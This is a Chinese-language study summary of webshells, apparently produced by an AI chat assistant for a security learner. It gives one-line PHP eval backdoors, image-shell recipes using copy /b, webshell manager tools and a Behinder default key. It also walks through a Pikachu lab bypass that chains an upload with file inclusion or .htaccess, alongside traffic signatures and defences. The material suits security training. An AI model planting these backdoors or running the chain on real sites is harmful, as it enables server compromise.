webshell

根据你提供的 PDF 文档和我们之前的对话我帮你整理了一份系统的知识点总结涵盖了 **Webshell 基础、制作与利用、管理工具、流量特征、清除与防御** 以及 **代理配置与文件上传实战** 等内容。---## 一、Webshell 核心概念PDF 第 1-2 页### 1. 什么是 Webshell- 以 ASP、PHP、JSP 等网页文件形式存在的**命令执行环境**俗称“网页后门”。- 通过 Webshell 可以获得**网站后台执行权限**文件操作、数据库操作、命令执行等。### 2. Webshell 的特点- 持续远程访问- 提权能力- 隐蔽性强### 3. Webshell 的分类| 类型 | 特点 ||------|------|| 大马 | 功能全面提权、脱库、代理、CMD 等体积大 || 小马 | 功能简单通常只有上传功能体积小 || 一句话木马 | 代码极短灵活性强可插入任意文件易变形免杀 || 内存马 | 无文件形式驻留在中间件进程中极难检测 |---## 二、常见 Webshell 写法PDF 第 3-6 页### 1. 一句话木马示例php?php eval($_POST[value]); ?- 抑制错误输出- eval() 将字符串作为 PHP 代码执行- $_POST[value] 接收攻击者发送的参数### 2. 图片马图片木马- **原理**在合法图片文件中嵌入一句话木马配合解析漏洞如文件包含、.htaccess触发执行。- **制作方法**- **命令法**copy ma.png/b 1.php mua.pngWindows- **Photoshop 法**在文件简介的标题或作者处插入木马- **十六进制编辑器**在图片末尾直接追加木马代码- **检测图片马是否成功**上传后重新下载改为 .txt 查看木马代码是否还在。### 3. 图片隐写多文件压缩- 将压缩包如 ZIP隐藏到图片中copy QQ.jpg/b 1.zip rd.jpg- 修改后缀为 .zip 即可解压出隐藏文件。### 4. 图片马连接失败的可能原因- 图片文件太大影响执行- 木马被服务器过滤或损坏- 缺少触发解析的漏洞如文件包含点---## 三、Webshell 管理工具PDF 第 7-35 页### 1. 蚁剑 (AntSword)- 开源、跨平台支持多种编码器。- 使用添加数据 → 输入 URL 和密码 → 连接后可执行虚拟终端、文件管理、数据库操作等。### 2. 中国菜刀 (Chopper)- 经典工具功能简单但流量特征明显。- 使用前建议放在虚拟机中运行。### 3. 冰蝎 (Behinder)- **动态二进制加密传输**密钥协商 AES 加密。- 默认连接密码 rebeyond密钥为 MD5 前 16 位e45e329feb5d925b。- 需要 Java 8 运行Java 11 需手动添加 JavaFX。### 4. 哥斯拉 (Godzilla)- 全流量加密支持多种 payload 和加密器。- 内置插件丰富过 WAF 能力强。- 需要 Java 环境双击 godzilla.jar 运行。---## 四、Webshell 工具流量特征PDF 第 36-52 页| 工具 | 特征 ||------|------|| **蚁剑** | User-Agent 常伪装为爬虫请求体包含 ini_set(display_errors,0) 等固定代码使用 base64 编码 || **菜刀** | User-Agent 为爬虫请求体固定特征 QGluaV9zZXQo...流量中会出现 XY 分隔符 || **冰蝎** | Accept: application/json, text/javascript, */*; q0.01Content-Type: application/x-www-form-urlencoded请求/响应均有固定头部如 dFAXQV1LORcHRQTL...Payload 经过 AES 加密 || **哥斯拉** | Cookie 末尾带分号如 PHPSESSIDxxx;Content-Length 极大上万请求体中包含大量 eval(base64_decode(strrev(urldecode(...)))) 嵌套解码 |---## 五、Webshell 清除与防御PDF 第 52-56 页### 1. 清除方法- **工具查杀**Windows 用 D 盾、火绒Linux 用 WebShellKiller、PHP Malware Finder。- **手动查杀**- 检查可疑进程、启动项、计划任务- 查看服务器账号安全隐藏账号、克隆账号- 分析安全日志eventvwr.msc- 检查异常端口netstat -ano### 2. 防御措施- 严格限制上传功能校验文件内容不仅后缀/MIME、目录权限最小化- 定期更新程序、密码复杂度要求- 对数据库名、后台路径等进行混淆或强口令- 部署 Web 应用防火墙WAF- 日常巡检对比文件完整性---## 六、结合对话的补充知识点代理配置 文件上传实战### 1. FoxyProxy BurpSuite 配置火狐浏览器- **Burp 设置**Proxy → Options 确认监听 127.0.0.1:8080- **FoxyProxy 添加代理**类型 HTTP地址 127.0.0.1端口 8080- **HTTPS 抓包**必须安装 Burp CA 证书访问 http://burp 下载并导入浏览器证书机构- **测试**开启代理后访问任意网站Burp 的 HTTP history 应出现记录### 2. Pikachu 文件上传第三关getimagesize 绕过- **防御机制**getimagesize() 检查文件头部幻数只允许真实图片上传。- **绕过方法**制作**图片马**利用**文件包含漏洞**触发。- **步骤**1. 制作图片马copy 1.jpg/b shell.php/a shell.jpg2. 上传图片马获取路径如 /unsafeupload/uploads/xxx.jpg3. 访问文件包含页面http://ip/pikachu/vul/fileinclude/fi_local.php?filename../unsafeupload/uploads/xxx.jpg4. 使用蚁剑连接密码为木马中的 $_POST[a]。### 3. 图片马是否必须配合 .htaccess- **不一定**。Pikachu 第三关使用的是**文件包含漏洞**无需 .htaccess。- .htaccess 是另一种利用方式上传 AddType application/x-httpd-php .jpg 让服务器将 .jpg 当作 PHP 解析。- 具体用哪种取决于目标环境是否存在文件包含、是否允许上传 .htaccess。---## 七、总结速记表| 知识点 | 关键点 ||--------|--------|| 一句话木马 | ?php eval($_POST[cmd]);? || 图片马制作 | copy a.jpg/b b.php c.jpg || 触发方式 | 文件包含 / .htaccess / 解析漏洞 || 蚁剑连接 | 需要 URL 密码流量有 ini_set 特征 || 冰蝎 | 默认密钥 e45e329feb5d925b流量 AES 加密 || 哥斯拉 | Cookie 末尾分号Content-Length 巨大 || 防御核心 | 上传校验真实文件类型 最小权限 定期查杀 |如果需要某一节如流量解密实战、某工具的详细用法展开说明可以告诉我。